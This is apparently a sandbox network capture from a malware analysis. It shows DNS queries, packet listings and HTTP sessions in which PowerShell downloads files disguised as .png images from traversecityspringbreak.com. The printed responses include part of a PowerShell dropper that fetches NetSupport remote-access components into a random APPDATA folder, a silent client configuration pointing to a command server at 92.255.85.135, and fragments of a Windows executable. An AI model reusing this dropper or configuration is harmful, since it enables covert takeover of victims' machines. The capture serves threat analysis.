                                                                                                                                                              Oct 28, 2024 19:46:26.591043949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.591097116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.591130018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.591154099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.591165066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.591200113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.591219902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.596385956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.596442938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.596465111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.596476078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.596509933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.596523046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.596543074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.596589088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.601943016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.601994991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.602029085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.602047920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.602078915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.602112055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.602125883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.607208014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.607242107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.607264996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.647520065 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:29.161295891 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:29.161391973 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:29.161448956 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:29.634030104 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:29.634073019 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:32.796499968 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:32.796587944 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:32.796636105 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:33.622917891 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:33.622955084 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:34.948474884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:35.117233992 CET49729443192.168.2.1692.255.85.135
                                                                                                                                                              Oct 28, 2024 19:46:35.117285013 CET4434972992.255.85.135192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:35.117351055 CET49729443192.168.2.1692.255.85.135
                                                                                                                                                              Oct 28, 2024 19:46:35.210639000 CET49729443192.168.2.1692.255.85.135
                                                                                                                                                              Oct 28, 2024 19:46:35.210659981 CET4434972992.255.85.135192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:35.210724115 CET4434972992.255.85.135192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:35.308736086 CET4973080192.168.2.16172.67.68.212
                                                                                                                                                              Oct 28, 2024 19:46:35.314461946 CET8049730172.67.68.212192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:35.314539909 CET4973080192.168.2.16172.67.68.212
                                                                                                                                                              Oct 28, 2024 19:46:35.340961933 CET4973080192.168.2.16172.67.68.212
                                                                                                                                                              Oct 28, 2024 19:46:35.347374916 CET8049730172.67.68.212192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:36.329104900 CET8049730172.67.68.212192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:36.329174042 CET4973080192.168.2.16172.67.68.212
                                                                                                                                                              Oct 28, 2024 19:47:18.351701021 CET49732443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:47:18.351749897 CET44349732172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:47:18.351831913 CET49732443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:47:18.352081060 CET49732443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:47:18.352098942 CET44349732172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:47:19.214000940 CET44349732172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:47:19.214349031 CET49732443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:47:19.214389086 CET44349732172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:47:19.215420008 CET44349732172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:47:19.215713978 CET49732443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:47:19.215806961 CET44349732172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:47:19.261312962 CET49732443192.168.2.16172.217.16.196

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Oct 28, 2024 19:45:13.640151978 CET53598011.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:13.641063929 CET53502281.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:14.330554962 CET6063753192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:14.331037045 CET6360553192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:14.359889984 CET53606371.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:14.360703945 CET53636051.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:14.869854927 CET53515011.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:18.216871977 CET5256753192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:18.217082977 CET6273553192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:18.227157116 CET53525671.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:18.227945089 CET53627351.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.884205103 CET53586721.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.274823904 CET6386053192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.274964094 CET5419553192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.277111053 CET6263253192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.277256966 CET5633653192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.284761906 CET53626321.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.284775972 CET53563361.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.386877060 CET5980653192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:34.387016058 CET6203753192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:34.394284010 CET53598061.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.395450115 CET53620371.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:50.816278934 CET53637531.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:11.362775087 CET6538153192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:46:11.381597042 CET53653811.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:13.167752981 CET53621431.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:13.355664015 CET53519791.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:15.737689972 CET6114253192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:46:15.748879910 CET53611421.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.056663990 CET138138192.168.2.16192.168.2.255
                                                                                                                                                              Oct 28, 2024 19:46:35.252579927 CET6262853192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:46:35.263154030 CET53626281.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:42.227401972 CET53592691.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:57.066961050 CET5944853192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:46:57.084337950 CET53594481.1.1.1192.168.2.16

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Oct 28, 2024 19:45:14.330554962 CET192.168.2.161.1.1.10xfc83Standard query (0)inspyrehomedesign.comA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:14.331037045 CET192.168.2.161.1.1.10xb476Standard query (0)inspyrehomedesign.com65IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:18.216871977 CET192.168.2.161.1.1.10x119Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:18.217082977 CET192.168.2.161.1.1.10x7b98Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.274823904 CET192.168.2.161.1.1.10xa925Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.274964094 CET192.168.2.161.1.1.10xda7aStandard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.277111053 CET192.168.2.161.1.1.10x455bStandard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.277256966 CET192.168.2.161.1.1.10xbc8dStandard query (0)i.ibb.co65IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:34.386877060 CET192.168.2.161.1.1.10xaf87Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:34.387016058 CET192.168.2.161.1.1.10x8435Standard query (0)i.ibb.co65IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:11.362775087 CET192.168.2.161.1.1.10x6010Standard query (0)inspyrehomedesign.comA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:15.737689972 CET192.168.2.161.1.1.10xab2aStandard query (0)traversecityspringbreak.comA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:35.252579927 CET192.168.2.161.1.1.10x2Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:57.066961050 CET192.168.2.161.1.1.10x8459Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Oct 28, 2024 19:45:14.359889984 CET1.1.1.1192.168.2.160xfc83No error (0)inspyrehomedesign.com166.1.160.75A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:18.227157116 CET1.1.1.1192.168.2.160x119No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:18.227945089 CET1.1.1.1192.168.2.160x7b98No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.282656908 CET1.1.1.1192.168.2.160xa925No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.282865047 CET1.1.1.1192.168.2.160xda7aNo error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.284761906 CET1.1.1.1192.168.2.160x455bNo error (0)i.ibb.co162.19.58.157A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.284761906 CET1.1.1.1192.168.2.160x455bNo error (0)i.ibb.co162.19.58.159A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.284761906 CET1.1.1.1192.168.2.160x455bNo error (0)i.ibb.co162.19.58.158A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.284761906 CET1.1.1.1192.168.2.160x455bNo error (0)i.ibb.co162.19.58.161A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.284761906 CET1.1.1.1192.168.2.160x455bNo error (0)i.ibb.co162.19.58.160A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:33.284761906 CET1.1.1.1192.168.2.160x455bNo error (0)i.ibb.co162.19.58.156A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:45:34.394284010 CET1.1.1.1192.168.2.160xaf87No error (0)i.ibb.co169.197.85.95A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:11.381597042 CET1.1.1.1192.168.2.160x6010No error (0)inspyrehomedesign.com166.1.160.75A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:15.748879910 CET1.1.1.1192.168.2.160xab2aNo error (0)traversecityspringbreak.com166.1.160.211A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:35.263154030 CET1.1.1.1192.168.2.160x2No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:35.263154030 CET1.1.1.1192.168.2.160x2No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:35.263154030 CET1.1.1.1192.168.2.160x2No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:57.084337950 CET1.1.1.1192.168.2.160x8459No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:57.084337950 CET1.1.1.1192.168.2.160x8459No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                                                              Oct 28, 2024 19:46:57.084337950 CET1.1.1.1192.168.2.160x8459No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • inspyrehomedesign.com
                                                                                                                                                              • https:
                                                                                                                                                                • i.ibb.co
                                                                                                                                                              • fs.microsoft.com
                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                              • www.google.com
                                                                                                                                                              • traversecityspringbreak.com
                                                                                                                                                              • 92.255.85.135connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                                              • geo.netsupportsoftware.com

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.1649726166.1.160.211807944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Oct 28, 2024 19:46:15.759381056 CET84OUTGET /o/o.png HTTP/1.1
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Oct 28, 2024 19:46:16.434668064 CET239INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:16 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 2040
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:37:16 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "671604ac-7f8"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Oct 28, 2024 19:46:16.435194016 CET1236INData Raw: 69 70 63 6f 6e 66 69 67 20 2f 66 6c 75 73 68 64 6e 73 0d 0a 0d 0a 24 72 61 6e 64 6f 6d 46 6f 6c 64 65 72 4e 61 6d 65 20 3d 20 2d 6a 6f 69 6e 20 28 28 36 35 2e 2e 39 30 29 20 2b 20 28 39 37 2e 2e 31 32 32 29 20 7c 20 47 65 74 2d 52 61 6e 64 6f 6d
                                                                                                                                                              Data Ascii: ipconfig /flushdns$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderNameNew-Item -ItemType Directory -Path $randomFolderPath
                                                                                                                                                              Oct 28, 2024 19:46:16.435560942 CET212INData Raw: 63 69 63 61 70 69 2e 64 6c 6c 22 0d 0a 24 66 69 6c 65 38 20 3d 20 24 50 61 63 68 20 2b 20 22 5c 50 43 49 43 48 45 4b 2e 44 4c 4c 22 0d 0a 24 66 69 6c 65 39 20 3d 20 24 50 61 63 68 20 2b 20 22 5c 50 43 49 43 4c 33 32 2e 44 4c 4c 22 0d 0a 24 66 69
                                                                                                                                                              Data Ascii: cicapi.dll"$file8 = $Pach + "\PCICHEK.DLL"$file9 = $Pach + "\PCICL32.DLL"$file10 = $Pach + "\remcmdstub.exe"$file11 = $Pach + "\TCCTL32.DLL"$file12 = $Pach + "\client32.exe"Invoke-WebRequest $url
                                                                                                                                                              Oct 28, 2024 19:46:16.435992002 CET592INData Raw: 2d 4f 75 74 46 69 6c 65 20 24 66 69 6c 65 0d 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 24 75 72 6c 32 20 2d 4f 75 74 46 69 6c 65 20 24 66 69 6c 65 32 0d 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 24 75 72 6c 33 20 2d
                                                                                                                                                              Data Ascii: -OutFile $fileInvoke-WebRequest $url2 -OutFile $file2Invoke-WebRequest $url3 -OutFile $file3Invoke-WebRequest $url4 -OutFile $file4Invoke-WebRequest $url5 -OutFile $file5Invoke-WebRequest $url6 -OutFile $file6Invoke-WebRequest $url
                                                                                                                                                              Oct 28, 2024 19:46:16.830071926 CET155OUTGET /o/1.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:16.993619919 CET885INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:16 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 647
                                                                                                                                                              Last-Modified: Mon, 28 Oct 2024 05:50:02 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "671f260a-287"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 30 78 65 37 35 35 61 66 38 33 0d 0a 0d 0a 5b 43 6c 69 65 6e 74 5d 0d 0a 5f 70 72 65 73 65 6e 74 3d 31 0d 0a 41 6c 77 61 79 73 4f 6e 54 6f 70 3d 31 0d 0a 44 69 73 61 62 6c 65 43 68 61 74 3d 31 0d 0a 44 69 73 61 62 6c 65 43 6c 6f 73 65 41 70 70 73 3d 30 0d 0a 48 69 64 65 57 68 65 6e 49 64 6c 65 3d 31 0d 0a 50 72 6f 74 6f 63 6f 6c 73 3d 33 0d 0a 52 41 44 49 55 53 53 65 63 72 65 74 3d 64 67 41 41 41 50 70 4d 6b 49 37 6b 65 34 39 34 66 4b 45 51 52 55 6f 61 62 6c 63 41 0d 0a 52 6f 6f 6d 53 70 65 63 3d 45 76 61 6c 0d 0a 53 68 6f 77 55 49 4f 6e 43 6f 6e 6e 65 63 74 3d 30 0d 0a 73 69 6c 65 6e 74 3d 31 0d 0a 53 4b 4d 6f 64 65 3d 31 0d 0a 53 4f 53 5f 41 6c 74 3d 30 0d 0a 53 4f 53 5f 4c 53 68 69 66 74 3d 30 0d 0a 53 4f 53 5f 52 53 68 69 66 74 3d 30 0d 0a 53 79 73 54 72 61 79 3d 30 0d 0a 55 6e 6c 6f 61 64 4d 69 72 72 6f 72 4f 6e 44 69 73 63 6f 6e 6e 65 63 74 3d 30 0d 0a 55 73 65 72 6e 61 6d 65 73 3d 2a 0d 0a 0d 0a 5b 5f 49 6e 66 6f 5d 0d 0a 46 69 6c 65 6e 61 6d 65 3d 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 [TRUNCATED]
                                                                                                                                                              Data Ascii: 0xe755af83[Client]_present=1AlwaysOnTop=1DisableChat=1DisableCloseApps=0HideWhenIdle=1Protocols=3RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcARoomSpec=EvalShowUIOnConnect=0silent=1SKMode=1SOS_Alt=0SOS_LShift=0SOS_RShift=0SysTray=0UnloadMirrorOnDisconnect=0Usernames=*[_Info]Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini[_License]quiet=1[Audio]DisableAudioFilter=1[General]BeepUsingSpeaker=0[HTTP]CMPI=60GatewayAddress=92.255.85.135:443gsk=GL:M@AEOHD<K?ACIGO:B=H@JBOGEgskmode=0GSK=GL:M@AEOHD<K?ACIGO:B=H@JBOGEGSKX=GL:M@AEOHD<K?ACIGO:B=H@JBOGE
                                                                                                                                                              Oct 28, 2024 19:46:17.054976940 CET155OUTGET /o/2.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:17.218087912 CET243INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:17 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 328056
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:57 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045d-50178"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Oct 28, 2024 19:46:17.218156099 CET1236INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ AAAA9AAgA1A0AAAARichAPELV
                                                                                                                                                              Oct 28, 2024 19:46:17.218616962 CET1236INData Raw: 89 7d fc 8b 7d f8 0f b6 9f 60 05 1f 10 8b 7d 0c 88 19 0f b6 9f 60 05 1f 10 88 59 01 0f b6 80 60 05 1f 10 88 41 02 8b 45 fc 0f b6 80 60 05 1f 10 88 41 03 83 ee 03 83 c2 03 83 c1 04 85 f6 0f 8f 6a ff ff ff 8b 7d 10 5b 8b c7 5f c6 01 00 5e 8b e5 5d
                                                                                                                                                              Data Ascii: }}`}`Y`AE`Aj}[_^]UQS]VuW3}uNd$Fu+vPE3=|8L3u}8L3u}}SIJZ
                                                                                                                                                              Oct 28, 2024 19:46:17.218653917 CET424INData Raw: 00 8b d8 81 e3 ff 00 00 00 03 b4 9f 00 0c 00 00 33 71 28 33 d6 8b f2 c1 ee 10 81 e6 ff 00 00 00 8b b4 b7 00 04 00 00 8b da c1 eb 18 03 34 9f 8b da c1 eb 08 81 e3 ff 00 00 00 33 b4 9f 00 08 00 00 8b da 81 e3 ff 00 00 00 03 b4 9f 00 0c 00 00 33 71
                                                                                                                                                              Data Ascii: 3q(3433q,3433q03433q434
                                                                                                                                                              Oct 28, 2024 19:46:17.219615936 CET1236INData Raw: c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 89 4d fc 8b 45 08 56 8b 71 05 57 8b 79 01 8b 57 44 33 10 8b ca c1 e9 10 81 e1 ff 00 00 00 8b 84 8e 00 04 00 00 8b da c1 eb 18 03 04 9e 8b ca c1 e9 08 81 e1 ff 00 00 00 33 84 8e 00 08
                                                                                                                                                              Data Ascii: UQSMEVqWyWD33M3G@333O<333O83
                                                                                                                                                              Oct 28, 2024 19:46:17.219650984 CET1236INData Raw: 8b 57 01 89 74 10 04 8b 98 08 91 1f 10 8b 77 01 8d 94 08 04 91 1f 10 89 1c 32 8b 98 0c 91 1f 10 8b 77 01 8b 55 f8 8d 94 10 04 91 1f 10 89 1c 32 8b 98 10 91 1f 10 8b 55 fc 8b 77 01 8d 94 10 04 91 1f 10 89 1c 32 8b 55 f4 8b 98 14 91 1f 10 8b 77 01
                                                                                                                                                              Data Ascii: Wtw2wU2Uw2Uw2H|-LE3$HE@HW4LWtUwPL2TW4Mu=|Mu3]EWD
                                                                                                                                                              Oct 28, 2024 19:46:17.219682932 CET1236INData Raw: f4 b8 08 00 00 00 2b c2 50 6a 00 51 e8 47 fb 01 00 83 c4 0c 8d 4f 02 8d 47 fe 51 8b 4d fc 50 e8 f4 f1 ff ff 83 c6 08 83 c7 08 8b 45 08 83 c0 08 3b 45 0c 89 45 08 8b 45 0c 0f 82 09 ff ff ff 5f 5e 5b 8b e5 5d c2 0c 00 55 8b ec 53 56 8b 75 08 33 c0
                                                                                                                                                              Data Ascii: +PjQGOGQMPE;EEE_^[]USVu3W};EEtwH@E}tNQVJWNGOVNOVOVWVWVQPWMu_^[]UUE
                                                                                                                                                              Oct 28, 2024 19:46:17.220647097 CET636INData Raw: f9 01 00 83 c4 08 2b 45 fc 75 15 ff 4d 10 74 20 0f be 1e 0f be 0f 46 47 85 db 75 ac 8b c3 2b c1 5f 5e 5b 8b e5 5d c3 5f 5e 8b c3 5b 8b e5 5d c3 5f 5e 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 3d 44 b7 1f 10 00 75 05 e8 0f
                                                                                                                                                              Data Ascii: +EuMt FGu+_^[]_^[]_^3[]U=Du=@u]VW}?t)d$HtFR.F>u_^]U=Du=@u]7VW}?t)d$HtFR
                                                                                                                                                              Oct 28, 2024 19:46:17.877283096 CET155OUTGET /o/3.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:18.039475918 CET243INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:17 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 773968
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:58 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045e-bcf50"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Oct 28, 2024 19:46:19.085897923 CET155OUTGET /o/4.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:19.251096010 CET566INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 328
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-148"
                                                                                                                                                              Accept-Ranges: bytes
